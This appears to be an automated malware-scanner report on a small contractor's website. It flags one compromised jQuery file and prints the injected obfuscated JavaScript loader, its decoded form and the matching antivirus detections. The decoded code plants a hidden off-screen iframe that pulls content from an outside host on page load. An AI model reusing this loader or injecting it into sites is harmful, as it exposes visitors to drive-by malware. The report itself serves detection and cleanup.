New scan:

Malware Scanner report for vrcontractors.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://vrcontractors.com/
200 OK
Content-Length: 4608
Content-Type: text/html
clean
http://vrcontractors.com/js/jquery-1.4.2.js
200 OK
Content-Length: 165027
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,
... 166 bytes are skipped ...
36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s);

Decoded script:



function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://michaelmazur.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;

function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://michaelmazur.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;

Antivirus reports:

Avast
JS:Redirector-ZK [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BYF
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_IFRAME.SMRR
Emsisoft
Trojan.JS.Iframe.BYF (B)
Comodo
TrojWare.JS.iFrame.BRR
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.A
TrendMicro
JS_IFRAME.SMRR
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.BS
MicroWorld-eScan
Trojan.JS.Iframe.BYF
NANO-Antivirus
Trojan.Script.Iframe.vjblc
F-Secure
Trojan.JS.Iframe.BYF
F-Prot
JS/IFrame.QD
Norman
Iframe.PG
GData
Trojan.JS.Iframe.BYF
Commtouch
JS/IFrame.QD
BitDefender
Trojan.JS.Iframe.BYF

http://vrcontractors.com/index.html
200 OK
Content-Length: 4608
Content-Type: text/html
clean
http://vrcontractors.com/about-us.html
200 OK
Content-Length: 4038
Content-Type: text/html
clean
http://vrcontractors.com/services.html
200 OK
Content-Length: 5162
Content-Type: text/html
clean
http://vrcontractors.com/testimonials.html
200 OK
Content-Length: 4616
Content-Type: text/html
clean
http://vrcontractors.com/portfolio.html
200 OK
Content-Length: 4398
Content-Type: text/html
clean
http://fabrik.slideshowpro.com/m/embed.js
200 OK
Content-Length: 24905
Content-Type: application/x-javascript
clean
http://vrcontractors.com/contact.php
200 OK
Content-Length: 9151
Content-Type: text/html
clean
http://vrcontractors.com/test404page.js
404 Not Found
Content-Length: 286
Content-Type: text/html
clean
http://vrcontractors.com/portfolio2.html
200 OK
Content-Length: 4396
Content-Type: text/html
clean
http://vrcontractors.com/portfolio3.html
200 OK
Content-Length: 4420
Content-Type: text/html
clean
http://vrcontractors.com/testimonials/content1.html
200 OK
Content-Length: 1099
Content-Type: text/html
clean
http://vrcontractors.com/testimonials/content2.html
200 OK
Content-Length: 1113
Content-Type: text/html
clean
http://vrcontractors.com/testimonials/content3.html
200 OK
Content-Length: 1113
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vrcontractors.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 00:32:28 GMT
Accept-Ranges: bytes
ETag: "fce2bff-1200-4d2647a957548"
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 4608
Content-Type: text/html
Last-Modified: Thu, 03 Jan 2013 16:01:42 GMT

...4608 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vrcontractors.com
Referer: http://www.google.com/search?q=vrcontractors.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vrcontractors.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vrcontractors.com/

Result: vrcontractors.com is not infected or malware details are not published yet.